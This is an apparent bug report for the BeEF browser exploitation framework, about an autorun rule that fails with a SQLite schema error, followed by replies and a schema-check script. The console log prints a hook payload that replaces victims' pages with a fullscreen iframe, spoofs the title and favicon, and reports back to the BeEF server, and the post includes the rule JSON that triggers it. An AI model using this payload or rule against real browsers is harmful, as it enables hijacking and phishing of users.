Q: Please provide a brief summary of the issue that you experienced. A: Attempted to add an ARE rule, loaded successfully, but threw exception when hooked client appeared.
Error: SQLite3::SQLException: no such column: executions.session
This implies that the database was not set up properly. This issue was created back when the database was reworked to replace DataMapper with ActiveRecord. I suspect wiping the database would resolve this issue. The database can be reset by deleting the database file (rm beef.db) or starting BeEF with the -x flag (./beef -x). Note that this will delete all hooked browsers, including command results, proxy history, etc.
My ARE rule json:
Your ARE rule worked fine for me when using XHR for command and control. WebSockets are effectively broken.
A review of the WebSockets command and control channel is tracked in #2781.
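To confirm a stale schema before deleting beef.db, the check below (an added example, not BeEF code or anything posted in this thread) reports which expected columns a SQLite database lacks. Only `executions.session` comes from the exception quoted above; the other column names and the in-memory databases are constructed for illustration.

```python
import sqlite3

# Assumption: the only requirement taken from the page is executions.session
# (the column named in the exception). Extend the map for other tables.
REQUIRED = {"executions": {"session"}}


def table_columns(conn, table):
    """Return the column names of `table`, or None if the table is absent."""
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name=?", (table,)
    ).fetchone()
    if row is None:
        return None
    # PRAGMA takes no bound parameters, so use the name as stored in
    # sqlite_master and quote it as an identifier (doubling any quotes).
    quoted = '"' + row[0].replace('"', '""') + '"'
    return {r[1] for r in conn.execute(f"PRAGMA table_info({quoted})")}


def schema_gaps(conn, required=REQUIRED):
    """Map table -> sorted missing columns, or ['<table missing>']."""
    gaps = {}
    for table, cols in required.items():
        present = table_columns(conn, table)
        if present is None:
            gaps[table] = ["<table missing>"]
        elif cols - present:
            gaps[table] = sorted(cols - present)
    return gaps


def make_db(ddl):
    """Build a constructed in-memory database from one DDL statement."""
    conn = sqlite3.connect(":memory:")
    conn.execute(ddl)
    return conn


# Constructed schemas: every column other than `session` is a placeholder.
STALE = make_db("CREATE TABLE executions (id INTEGER PRIMARY KEY, rule_id INTEGER)")
CURRENT = make_db(
    "CREATE TABLE executions (id INTEGER PRIMARY KEY, session TEXT, rule_id INTEGER)"
)
EMPTY = make_db("CREATE TABLE unrelated (id INTEGER)")

if __name__ == "__main__":
    for label, conn in (("stale", STALE), ("current", CURRENT), ("empty", EMPTY)):
        print(label, schema_gaps(conn) or "schema OK")
```

Against a real file, open it read-only with `sqlite3.connect("file:beef.db?mode=ro", uri=True)` so the check cannot modify the data it inspects.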
Summary
Q: Please provide a brief summary of the issue that you experienced.
A: Attempted to add an ARE rule, loaded successfully, but threw exception when hooked client appeared.
Environment
BeEF Version:
0.5.0.0
Ruby Version:
ruby 2.7.2p137 (2020-10-01 revision 5445e04352) [x86_64-linux-gnu]
Browser Details (e.g. Chrome v81.0):
Firefox 78.8.0esr
Operating System (e.g. OSX Catalina):
Kali linux 2021.1
Configuration
Q: Have you made any changes to your BeEF configuration?
A: Yes, enabled WebSocket. Outcome is the same if disabled.
Q: Have you enabled or disabled any BeEF extensions?
A: Yes
Expected vs. Actual Behaviour
Expected Behaviour:
ARE executing the module defined
Actual Behaviour:
Throws exception, retries, throws exception
Additional Information
Beef console output:
[16:01:34][] BeEF is loading. Wait a few seconds...
[16:01:35][>] Server: mounted handler '/hook.js'
[16:01:35][>] Server: mounted handler '/init'
[16:01:35][>] Server: mounted handler '/'
[16:01:35][>] Server: mounted handler '/dh'
[16:01:35][>] Server: mounted handler '/api/hooks'
[16:01:35][>] Server: mounted handler '/api/browserdetails'
[16:01:35][>] Server: mounted handler '/api/modules'
[16:01:35][>] Server: mounted handler '/api/categories'
[16:01:35][>] Server: mounted handler '/api/logs'
[16:01:35][>] Server: mounted handler '/api/admin'
[16:01:35][>] Server: mounted handler '/api/server'
[16:01:35][>] Server: mounted handler '/api/autorun'
[16:01:35][>] Server: mounted handler '/demos'
[16:01:35][>] Server: mounted handler '/demos/butcher/index.html'
[16:01:35][>] Server: mounted handler '/demos/secret_page.html'
[16:01:35][>] Server: mounted handler '/demos/basic.html'
[16:01:35][>] Server: mounted handler '/demos/report.html'
[16:01:35][>] Server: mounted handler '/demos/clickjacking/clickjack_attack.html'
[16:01:35][>] Server: mounted handler '/demos/clickjacking/clickjack_victim.html'
[16:01:35][>] Server: mounted handler '/demos/plain.html'
[16:01:35][>] Server: mounted handler '/ui/authentication'
[16:01:35][>] Server: mounted handler '/ui/modules'
[16:01:35][>] Server: mounted handler '/ui/panel'
[16:01:35][>] Server: mounted handler '/ui/media'
[16:01:35][>] [AdminUI] Initializing admin panel ...
[16:01:35][>] [AdminUI] Minifying web_ui_all (384610 bytes)
[16:01:38][>] [AdminUI] Minified web_ui_all (216111 bytes)
[16:01:38][>] [AdminUI] Minifying web_ui_auth (1787 bytes)
[16:01:39][>] [AdminUI] Minified web_ui_auth (1122 bytes)
[16:01:39][>] Server: mounted handler '/ui/web_ui_all.js'
[16:01:39][>] Server: mounted handler '/ui/web_ui_auth.js'
[16:01:39][>] Server: mounted handler '/api/network'
[16:01:39][>] Server: mounted handler '/event'
[16:01:39][>] Server: mounted handler '/api/proxy'
[16:01:39][>] Server: mounted handler '/api/seng'
[16:01:39][>] Server: mounted handler '/ps'
[16:01:39][] 6 extensions enabled:
[16:01:39] | Demos
[16:01:39] | Admin UI
[16:01:39] | Network
[16:01:39] | Events
[16:01:39] | Proxy
[16:01:39] |_ Social Engineering
[16:01:39][] 303 modules enabled.
[16:01:39][] 2 network interfaces were detected.
[16:01:39][] running on network interface: 127.0.0.1
[16:01:39] | Hook URL: http://127.0.0.1:3000/hook.js
[16:01:39] |_ UI URL: http://127.0.0.1:3000/ui/panel
[16:01:39][] running on network interface: 192.168.1.70
[16:01:39] | Hook URL: http://192.168.1.70:3000/hook.js
[16:01:39] |_ UI URL: http://192.168.1.70:3000/ui/panel
[16:01:39][] RESTful API key: d2884a567449945b4089757ff029d8e39cf6df40
[16:01:39][] HTTP Proxy: http://127.0.0.1:6789
[16:01:39][>] [ARE] Processing rule: /usr/share/beef-xss/./arerules/enabled/iframe_redirect.json
[16:01:39][>] Server: mounted handler '/command/site_redirect_iframe.js'
[16:01:39][>] Hard Load module: 'site_redirect_iframe'
[16:01:39][] [ARE] Ruleset (Redirect Browser (iFrame)) parsed and stored successfully.
[16:01:39] |_ Target Browser: ALL (ALL)
[16:01:39] |_ Target OS: ALL (ALL)
[16:01:39] |_ Modules to Trigger:
[16:01:39] |_ () Name: site_redirect_iframe
[16:01:39] |_ () Condition:
[16:01:39] |_ () Code:
[16:01:39] |_ () Options:
[16:01:39] |_ iframe_title: (Site)
[16:01:39] |_ iframe_favicon: (https://www.site.com/favicon.ico)
[16:01:39] |_ iframe_src: (https://www.site.com/)
[16:01:39] |_ iframe_timeout: (3500)
[16:01:39] |_ Exec order: [0]
[16:01:39] |_ Exec delay: [0]
[16:01:39][] Starting WebSocket server ws://0.0.0.0:61985 [timer: 1000]
[16:01:39][] BeEF server started (press control+c to stop)
[16:01:54][>] Event: User with ip 127.0.0.1 has successfully authenticated in the application.
[16:02:05][>] [INIT] Processing Browser Details...
[16:02:05][>] Event: 192.168.1.70 just joined the horde from the domain: localhost:80
[16:02:05][!] [Browser Details] Invalid browser plugins returned from the hook browser's initial connection.
[16:02:05][] New Hooked Browser [id:1, ip:192.168.1.70, browser:FF-78, os:Linux-], hooked domain [localhost:80]
[16:02:05][>] Hooked browser has network interface 127.0.0.1
[16:02:05][>] [WebSocket] New WebSocket channel open.
[16:02:05][>] [WebSocket] Browser says helo! WebSocket is running
[16:02:05][>] [WebSocket] activeSocket content [{"TIKrTJAlaRYYIl9ukELP8trdGpOQPfl3t9OOIuw7mXRUdPsgUfWLDUqua4QBSi2xdtrmceuAZpMw4Lrl"=>#<EventMachine::WebSocket::Connection:0x00005644090e7a38 @signature=52, @options={:host=>"0.0.0.0", :port=>61985, :secure=>false}, @debug=false, @secure=false, @secure_proxy=false, @tls_options={}, @close_timeout=nil, @handler=#<EventMachine::WebSocket::Handler13:0x00005644090e5198 @connection=#<EventMachine::WebSocket::Connection:0x00005644090e7a38 ...>, @debug=false, @state=:connected, @close_timer=nil, @data="", @application_data_buffer="", @frame_type=nil>, @onopen=#<Proc:0x00005644090e78d0 /usr/share/beef-xss/core/main/network_stack/websocket/websocket.rb:81>, @onerror=#<Proc:0x00005644090e78a8 /usr/share/beef-xss/core/main/network_stack/websocket/websocket.rb:85>, @onclose=#<Proc:0x00005644090e7880 /usr/share/beef-xss/core/main/network_stack/websocket/websocket.rb:89>, @onmessage=#<Proc:0x00005644090e7858 /usr/share/beef-xss/core/main/network_stack/websocket/websocket.rb:93>, @handshake=nil>}]
[16:02:05][*] [ARE] Checking if any defined rules should be triggered on target.
[16:02:05] |_ Browser version check -> (hook) 78 ALL (rule) : true
[16:02:05] |_ OS version check -> (hook) ALL (rule): true
[16:02:05] |_ Hooked browser and OS type/version MATCH rule: Redirect Browser (iFrame).
[16:02:05] |_ Found [1/1] ARE rules matching the hooked browser type/version.
[16:02:05] |_ Preparing JS for command id [1], module [site_redirect_iframe]
[16:02:05] | Final Modules Wrapper:
[16:02:05] |
[16:02:05] | var site_redirect_iframe_7262779878 = function(){
[16:02:05] | beef.execute(function() {
[16:02:05] |
[16:02:05] | var result = 'Iframe successfully created!';
[16:02:05] | var title = 'Site';
[16:02:05] | var iframe_src = 'https://www.site.com';
[16:02:05] | var iframe_favicon = 'https://www.site.com/favicon.ico';
[16:02:05] | var sent = false;
[16:02:05] |
[16:02:05] | $j("iframe").remove();
[16:02:05] |
[16:02:05] | beef.dom.createIframe('fullscreen', {'src':iframe_src}, {}, function() { if(!sent) { sent = true; document.title = title; beef.net.send('/command/site_redirect_iframe.js', 1, 'result='+result); } });
[16:02:05] | document.body.scroll = "no";
[16:02:05] | document.documentElement.style.overflow = 'hidden';
[16:02:05] | beef.browser.changeFavicon(iframe_favicon);
[16:02:05] |
[16:02:05] | setTimeout(function() {
[16:02:05] | if(!sent) {
[16:02:05] | result = 'Iframe failed to load, timeout';
[16:02:05] | beef.net.send('/command/site_redirect_iframe.js', 1, 'result='+result);
[16:02:05] | document.title = iframe_src + " is not available";
[16:02:05] | sent = true;
[16:02:05] | }
[16:02:05] | }, 3500);
[16:02:05] |
[16:02:05] | });
[16:02:05] | };
[16:02:05] | var site_redirect_iframe_7262779878_can_exec = false;
[16:02:05] | var site_redirect_iframe_7262779878_mod_output = null;
[16:02:05] |
[16:02:05] |_ setTimeout(function(){site_redirect_iframe_7262779878();}, 0);
[16:02:05][!] [WebSocket] Error: unknown attribute 'session' for BeEF::Core::Models::Execution.
[16:02:05][!] [WebSocket] Error: SQLite3::SQLException: no such column: executions.session
[16:02:05][>] [WebSocket] Connection closed: {:code=>3000, :reason=>"Application error", :was_clean=>true}
My ARE rule json:
{
  "name": "Redirect Browser (iFrame)",
  "author": "author",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {
      "name": "site_redirect_iframe",
      "condition": null,
      "options": {
        "iframe_title": "Site",
        "iframe_favicon": "https://www.site.com/favicon.ico",
        "iframe_src": "https://www.site.com/",
        "iframe_timeout": "3500"
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
}